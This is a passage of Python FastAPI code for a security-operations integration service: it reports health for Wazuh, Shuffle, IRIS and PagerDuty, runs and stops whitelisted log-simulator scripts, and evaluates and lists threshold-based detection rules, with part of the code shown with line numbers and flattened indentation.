    pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True)
    pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False)
    # Best-effort recent rows per system: capture the error, never raise.
    wazuh_recent: list[object] = []
    wazuh_recent_error: str | None = None
    try:
        wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None)
        wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit]
    except Exception as exc:
        wazuh_recent_error = str(exc)
    shuffle_recent: list[object] = []
    shuffle_recent_error: str | None = None
    try:
        workflows_resp = await shuffle_adapter.list_workflows()
        workflows = _extract_first_array(workflows_resp)
        for item in workflows[:row_limit]:
            if isinstance(item, dict):
                # Normalize workflow entries to a compact id/name/status shape.
                shuffle_recent.append(
                    {
                        "id": item.get("id") or item.get("workflow_id"),
                        "name": item.get("name") or item.get("workflow", {}).get("name"),
                        "status": item.get("status"),
                    }
                )
            else:
                shuffle_recent.append(item)
    except Exception as exc:
        shuffle_recent_error = str(exc)
    iris_recent: list[object] = []
    iris_recent_error: str | None = None
    try:
        iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0)
        iris_recent = _extract_first_array(iris_resp)[:row_limit]
    except Exception as exc:
        iris_recent_error = str(exc)
    pagerduty_recent = repo.list_recent_escalations(limit=row_limit)

    def build_card(
        label: str,
        dependency_key: str,
        recent: list[object],
        kpis: dict[str, object],
        extra_error: str | None = None,
    ) -> dict[str, object]:
        # Fold dependency health + recent-fetch outcome into one card.
        # Status: "ok" when the dependency is up, "degraded" when it is up but
        # the recent-rows fetch failed, otherwise "down".
        dep = dependencies.get(dependency_key, {})
        dep_status = str(dep.get("status") or "down")
        status = "ok" if dep_status == "up" else "down"
        if dep_status == "up":
            # Side effect: refresh the persisted last-ok timestamp.
            last_ok_at_by_key[label] = now_iso
        error_parts: list[str] = []
        if dep.get("error"):
            error_parts.append(str(dep.get("error")))
        if extra_error:
            error_parts.append(extra_error)
        if dep_status == "up" and extra_error:
            status = "degraded"
        card: dict[str, object] = {
            "status": status,
            "latency_ms": dep.get("latency_ms"),
            "last_ok_at": last_ok_at_by_key.get(label),
            "last_error": " | ".join(error_parts) if error_parts else None,
            "kpis": kpis,
            "recent": recent,
        }
        if include_raw:
            card["raw"] = dep.get("details")
        return card

    cards = {
        "wazuh": build_card(
            label="wazuh",
            dependency_key="wazuh",
            recent=wazuh_recent,
            extra_error=wazuh_recent_error,
            kpis={
                "alerts_ingested": alerts_ingested,
                "recent_rows": len(wazuh_recent),
            },
        ),
        "shuffle": build_card(
            label="shuffle",
            dependency_key="shuffle",
            recent=shuffle_recent,
            extra_error=shuffle_recent_error,
            kpis={
                "recent_workflows": len(shuffle_recent),
            },
        ),
        "iris": build_card(
            label="iris",
            dependency_key="iris",
            recent=iris_recent,
            extra_error=iris_recent_error,
            kpis={
                "tickets_created": iris_tickets_created,
                "recent_rows": len(iris_recent),
            },
        ),
        "pagerduty": build_card(
            label="pagerduty",
            dependency_key="pagerduty_stub",
            recent=pagerduty_recent,
            kpis={
                "escalations_sent": pagerduty_escalations_sent,
                "escalations_failed": pagerduty_escalations_failed,
            },
        ),
    }
    # Persist refreshed last-ok timestamps for subsequent requests.
    app.state.systems_monitor_state = monitor_state
    return ApiResponse(
        data={
            "generated_at": now_iso,
            "window_minutes": window_minutes,
            "cards": cards,
            "pipeline": {
                "alerts_ingested": alerts_ingested,
                "detections_matched": detections_matched,
                "iris_tickets_created": iris_tickets_created,
                "pagerduty_escalations_sent": pagerduty_escalations_sent,
                "pagerduty_escalations_failed": pagerduty_escalations_failed,
            },
        }
    )
  1728. @app.get(
  1729. "/sim/logs/runs",
  1730. response_model=ApiResponse,
  1731. dependencies=[Depends(require_internal_api_key)],
  1732. summary="List simulator runs",
  1733. description="List active and recent simulator script runs started from soc-integrator.",
  1734. )
  1735. async def sim_logs_runs() -> ApiResponse:
  1736. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1737. items: list[dict[str, object]] = []
  1738. for run_id, run in sim_runs.items():
  1739. serialized = _serialize_sim_run(run_id, run)
  1740. if (not serialized["running"]) and not run.get("stopped_at"):
  1741. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1742. serialized["stopped_at"] = run["stopped_at"]
  1743. items.append(serialized)
  1744. items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True)
  1745. return ApiResponse(data={"items": items})
  1746. @app.post(
  1747. "/sim/logs/start",
  1748. response_model=ApiResponse,
  1749. dependencies=[Depends(require_internal_api_key)],
  1750. summary="Start simulator logs script",
  1751. description="Start a whitelisted simulator script in background and return run metadata.",
  1752. )
  1753. async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse:
  1754. script_name = SIM_SCRIPT_MAP[payload.script]
  1755. script_path = SIM_SCRIPTS_DIR / script_name
  1756. if not script_path.exists():
  1757. raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}")
  1758. cmd = _build_sim_command(payload)
  1759. env = dict(os.environ)
  1760. env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager")
  1761. env.setdefault("WAZUH_SYSLOG_PORT", "514")
  1762. run_id = str(uuid.uuid4())
  1763. log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log"
  1764. log_handle = None
  1765. try:
  1766. log_handle = log_file.open("ab")
  1767. process = subprocess.Popen(
  1768. cmd,
  1769. cwd=str(SIM_SCRIPTS_DIR),
  1770. env=env,
  1771. stdout=log_handle,
  1772. stderr=subprocess.STDOUT,
  1773. start_new_session=True,
  1774. )
  1775. except Exception as exc:
  1776. if log_handle:
  1777. try:
  1778. log_handle.close()
  1779. except Exception:
  1780. pass
  1781. raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc
  1782. finally:
  1783. if log_handle:
  1784. log_handle.close()
  1785. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1786. sim_runs[run_id] = {
  1787. "script": payload.script,
  1788. "target": payload.target,
  1789. "scenario": payload.scenario,
  1790. "count": payload.count,
  1791. "delay_seconds": payload.delay_seconds,
  1792. "forever": payload.forever,
  1793. "pid": process.pid,
  1794. "cmd": " ".join(shlex.quote(part) for part in cmd),
  1795. "started_at": datetime.now(timezone.utc).isoformat(),
  1796. "stopped_at": None,
  1797. "return_code": None,
  1798. "log_file": str(log_file),
  1799. "process": process,
  1800. }
  1801. app.state.sim_runs = sim_runs
  1802. return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])})
  1803. @app.post(
  1804. "/sim/logs/stop/{run_id}",
  1805. response_model=ApiResponse,
  1806. dependencies=[Depends(require_internal_api_key)],
  1807. summary="Stop simulator run",
  1808. description="Stop a running simulator script by run_id.",
  1809. )
  1810. async def sim_logs_stop(run_id: str) -> ApiResponse:
  1811. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1812. run = sim_runs.get(run_id)
  1813. if not run:
  1814. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1815. process = run.get("process")
  1816. if process and process.poll() is None:
  1817. try:
  1818. process.terminate()
  1819. process.wait(timeout=3)
  1820. except subprocess.TimeoutExpired:
  1821. process.kill()
  1822. except Exception as exc:
  1823. raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc
  1824. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1825. return ApiResponse(data={"run": _serialize_sim_run(run_id, run)})
  1826. @app.post(
  1827. "/sim/logs/stop-running",
  1828. response_model=ApiResponse,
  1829. dependencies=[Depends(require_internal_api_key)],
  1830. summary="Stop all running simulator runs",
  1831. description="Stop all currently running simulator scripts (including forever mode).",
  1832. )
  1833. async def sim_logs_stop_running() -> ApiResponse:
  1834. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1835. stopped: list[dict[str, object]] = []
  1836. already_stopped = 0
  1837. for run_id, run in sim_runs.items():
  1838. process = run.get("process")
  1839. if process and process.poll() is None:
  1840. try:
  1841. process.terminate()
  1842. process.wait(timeout=3)
  1843. except subprocess.TimeoutExpired:
  1844. process.kill()
  1845. except Exception as exc:
  1846. raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc
  1847. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1848. stopped.append(_serialize_sim_run(run_id, run))
  1849. else:
  1850. already_stopped += 1
  1851. return ApiResponse(
  1852. data={
  1853. "stopped_count": len(stopped),
  1854. "already_stopped_count": already_stopped,
  1855. "runs": stopped,
  1856. }
  1857. )
  1858. @app.get(
  1859. "/sim/logs/output/{run_id}",
  1860. response_model=ApiResponse,
  1861. dependencies=[Depends(require_internal_api_key)],
  1862. summary="Get simulator run output",
  1863. description="Return tailed output lines from simulator run log file.",
  1864. )
  1865. async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse:
  1866. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1867. run = sim_runs.get(run_id)
  1868. if not run:
  1869. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1870. log_file_path = run.get("log_file")
  1871. if not log_file_path:
  1872. raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}")
  1873. log_file = Path(str(log_file_path))
  1874. lines = _tail_log_lines(log_file, limit=limit)
  1875. process = run.get("process")
  1876. running = bool(process and process.poll() is None)
  1877. return ApiResponse(
  1878. data={
  1879. "run_id": run_id,
  1880. "running": running,
  1881. "line_count": len(lines),
  1882. "lines": lines,
  1883. "text": "\n".join(lines),
  1884. "log_file": str(log_file),
  1885. }
  1886. )
  1887. @app.get(
  1888. "/sim/logs/wazuh-latest/{run_id}",
  1889. response_model=ApiResponse,
  1890. dependencies=[Depends(require_internal_api_key)],
  1891. summary="Get latest Wazuh logs/rules for simulator run",
  1892. description="Return latest Wazuh event logs and matched rules correlated to a simulator run.",
  1893. )
  1894. async def sim_logs_wazuh_latest(
  1895. run_id: str,
  1896. limit: int = 50,
  1897. minutes: int = 15,
  1898. include_raw: bool = False,
  1899. ) -> ApiResponse:
  1900. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1901. run = sim_runs.get(run_id)
  1902. if not run:
  1903. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1904. requested_minutes = max(1, int(minutes))
  1905. # Keep query unfiltered and use a wide lookback to emulate Discover "latest records".
  1906. effective_minutes = max(1440, requested_minutes)
  1907. query_limit = max(1, min(int(limit), 200))
  1908. query_text = "*"
  1909. try:
  1910. raw = await wazuh_adapter.search_alerts(
  1911. query=query_text,
  1912. limit=query_limit,
  1913. minutes=effective_minutes,
  1914. )
  1915. except Exception as exc:
  1916. raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc
  1917. hits = _extract_wazuh_hits(raw)
  1918. events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits]
  1919. rules: list[dict[str, object]] = []
  1920. for hit in hits:
  1921. rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw)
  1922. if rule_item:
  1923. rules.append(rule_item)
  1924. return ApiResponse(
  1925. data={
  1926. "run": _serialize_sim_run(run_id, run),
  1927. "query": {
  1928. "effective_minutes": effective_minutes,
  1929. "text": query_text,
  1930. "limit": query_limit,
  1931. },
  1932. "events": events,
  1933. "rules": rules,
  1934. "totals": {
  1935. "events": len(events),
  1936. "rules": len(rules),
  1937. },
  1938. }
  1939. )
  1940. @app.post(
  1941. "/monitor/log-loss/check",
  1942. response_model=ApiResponse,
  1943. dependencies=[Depends(require_internal_api_key)],
  1944. summary="Check log loss",
  1945. description="Check expected telemetry streams for missing logs in a configurable lookback window.",
  1946. )
  1947. async def monitor_log_loss_check(
  1948. payload: LogLossCheckRequest | None = None,
  1949. create_ticket: bool = False,
  1950. ) -> ApiResponse:
  1951. req = payload or LogLossCheckRequest()
  1952. result = await _execute_log_loss_check(req=req, create_ticket=create_ticket)
  1953. return ApiResponse(data=result)
@app.post(
    "/monitor/c-detections/evaluate",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="Evaluate Appendix C detections",
    description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.",
)
async def monitor_c_detections_evaluate(payload: CDetectionEvaluateRequest) -> ApiResponse:
    """Run C1-C3 detection rules over recent Wazuh events and persist matches.

    Flow: search Wazuh -> normalize hits -> evaluate rules -> persist each
    match; unless ``dry_run`` (and outside the per-(usecase, entity) ticket
    cooldown) also ingest an incident and write its key back onto the stored
    match row. Start/finish/status of each run is mirrored into
    ``app.state.c_detection_state``.

    Raises:
        HTTPException: 400 when C detection is disabled, 502 on any failure
            during search/evaluation/persistence.
    """
    if not settings.c_detection_enabled:
        raise HTTPException(status_code=400, detail="C detection is disabled by configuration")
    started_at = datetime.now(timezone.utc).isoformat()
    app.state.c_detection_state["last_started_at"] = started_at
    try:
        raw = await wazuh_adapter.search_alerts(
            query=payload.query,
            limit=max(1, payload.limit),
            minutes=max(1, payload.minutes),
        )
        # Defensive unwrap of the OpenSearch-style {"hits": {"hits": [...]}} envelope.
        hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else []
        normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits]
        evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors)
        records: list[dict[str, object]] = []
        for match in evaluated.get("matches", []):
            usecase_id = str(match.get("usecase_id") or "")
            entity = str(match.get("entity") or "unknown")
            severity = str(match.get("severity") or "medium")
            evidence = dict(match.get("evidence") or {})
            event_ref = {
                "event_id": ((match.get("event") or {}).get("event_id")),
                "timestamp": ((match.get("event") or {}).get("timestamp")),
                "source": ((match.get("event") or {}).get("source")),
            }
            # Cooldown suppresses duplicate tickets for the same (usecase, entity).
            in_cooldown = repo.is_c_detection_in_cooldown(
                usecase_id=usecase_id,
                entity=entity,
                cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds),
            )
            incident_key: str | None = None
            # The match row is persisted even when no ticket will be created.
            event_row = repo.add_c_detection_event(
                usecase_id=usecase_id,
                entity=entity,
                severity=severity,
                evidence=evidence,
                event_ref=event_ref,
                incident_key=None,
            )
            if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown:
                incident_event = _c_match_to_incident_event(match)
                ingest = await mvp_service.ingest_incident(incident_event)
                # Empty string collapses to None so the DB column stays NULL.
                incident_key = str(ingest.get("incident_key") or "") or None
                repo.update_c_detection_incident(int(event_row["id"]), incident_key)
            records.append(
                {
                    "id": event_row["id"],
                    "usecase_id": usecase_id,
                    "entity": entity,
                    "severity": severity,
                    "incident_key": incident_key,
                    "cooldown_active": in_cooldown,
                    "evidence": evidence,
                }
            )
        result = {
            "query": payload.query,
            "minutes": max(1, payload.minutes),
            "selectors": payload.selectors,
            "dry_run": payload.dry_run,
            "summary": evaluated.get("summary", {}),
            "matches": records,
            "total_hits": len(hits),
        }
        app.state.c_detection_state["last_status"] = "ok"
        app.state.c_detection_state["last_result"] = result
        app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
        return ApiResponse(data=result)
    except Exception as exc:
        # Record the failure in shared state before translating to HTTP 502.
        app.state.c_detection_state["last_status"] = "error"
        app.state.c_detection_state["last_error"] = str(exc)
        app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
        raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc
  2034. @app.get(
  2035. "/monitor/c-detections/history",
  2036. response_model=ApiResponse,
  2037. dependencies=[Depends(require_internal_api_key)],
  2038. summary="C detection history",
  2039. description="List persisted C1-C3 detection matches, including evidence and linked incident keys.",
  2040. )
  2041. async def monitor_c_detections_history(
  2042. limit: int = 50,
  2043. offset: int = 0,
  2044. usecase_id: str | None = None,
  2045. ) -> ApiResponse:
  2046. rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id)
  2047. return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id})
  2048. @app.get(
  2049. "/monitor/c-detections/state",
  2050. response_model=ApiResponse,
  2051. dependencies=[Depends(require_internal_api_key)],
  2052. summary="C detection state",
  2053. description="Return Appendix C detection settings and last evaluation runtime state.",
  2054. )
  2055. async def monitor_c_detections_state() -> ApiResponse:
  2056. return ApiResponse(
  2057. data={
  2058. "enabled": settings.c_detection_enabled,
  2059. "settings": {
  2060. "window_minutes": settings.c_detection_window_minutes,
  2061. "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph,
  2062. "c2_offhours_start_utc": settings.c2_offhours_start_utc,
  2063. "c2_offhours_end_utc": settings.c2_offhours_end_utc,
  2064. "c3_host_spread_threshold": settings.c3_host_spread_threshold,
  2065. "c3_scan_port_threshold": settings.c3_scan_port_threshold,
  2066. "create_iris_ticket": settings.c_detection_create_iris_ticket,
  2067. "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds,
  2068. },
  2069. "state": getattr(app.state, "c_detection_state", {}),
  2070. }
  2071. )